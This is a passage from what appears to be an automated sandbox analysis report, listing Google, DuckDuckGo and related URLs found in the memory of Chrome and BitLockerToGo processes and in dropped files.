              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722576266.000042E800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718165993.000042E8002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718165993.000042E8002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000006.00000002.2726357615.000042E8010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719097058.000042E8004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
              Source: chromecache_69.8.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
              Source: chrome.exe, 00000006.00000002.2718348673.000042E800310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
              Source: chrome.exe, 00000006.00000002.2718348673.000042E800310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
              Source: chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
              Source: chrome.exe, 00000006.00000003.2640100267.000042E80042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718619074.000042E8003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719578869.000042E800630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
              Source: chrome.exe, 00000006.00000002.2719387751.000042E8005A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
              Source: chrome.exe, 00000006.00000002.2717253256.000042E80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
              Source: chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.000000000538B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719835274.000042E8006D8000.00000004.00000800.00020000.00000000.sdmp, hvknym.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
              Source: chromecache_70.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_70.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_70.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_70.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2r
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9r
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Cs
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Et
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ForcedOff_PriceTrackingSubscriptionServiceLocaleKey
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fs
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ht
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ms
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ot
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Pq
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Rt
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ws
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zs
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/as
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ds
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ft
              Source: chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjx
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ks
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ns
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/pv
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/us
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xs
              Source: chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xt
              Source: chrome.exe, 00000006.00000002.2715824511.000019780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679230080.000042E8015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679175757.000042E8015BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2679204949.000042E8015C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
              Source: chrome.exe, 00000006.00000003.2636055946.0000197800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
              Source: chrome.exe, 00000006.00000003.2680320689.000042E80173C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2680261497.000042E801734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
              Source: chrome.exe, 00000006.00000002.2717284062.000042E800030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 00000006.00000002.2717882131.000042E8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
              Source: chrome.exe, 00000006.00000002.2719387751.000042E8005A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
              Source: chrome.exe, 00000006.00000003.2676451585.000042E8014AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: jwb1ny.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
              Source: chrome.exe, 00000006.00000002.2720135243.000042E8007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2722634762.000042E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718888407.000042E80047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2720099214.000042E8007A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
              Source: chrome.exe, 00000006.00000003.2676988158.000042E801A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
              Source: chrome.exe, 00000006.00000002.2715765715.0000197800770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676988158.000042E801A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
              Source: chrome.exe, 00000006.00000003.2676988158.000042E801A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardB
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
              Source: chrome.exe, 00000006.00000002.2715765715.0000197800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
              Source: chrome.exe, 00000006.00000002.2715765715.0000197800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
              Source: chrome.exe, 00000006.00000003.2672376514.000042E800FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
              Source: chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
              Source: chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
              Source: chrome.exe, 00000006.00000003.2635292042.000019780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
              Source: chrome.exe, 00000006.00000003.2636615707.00001978006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
              Source: chrome.exe, 00000006.00000003.2634990760.0000197800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2676649448.000042E800824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
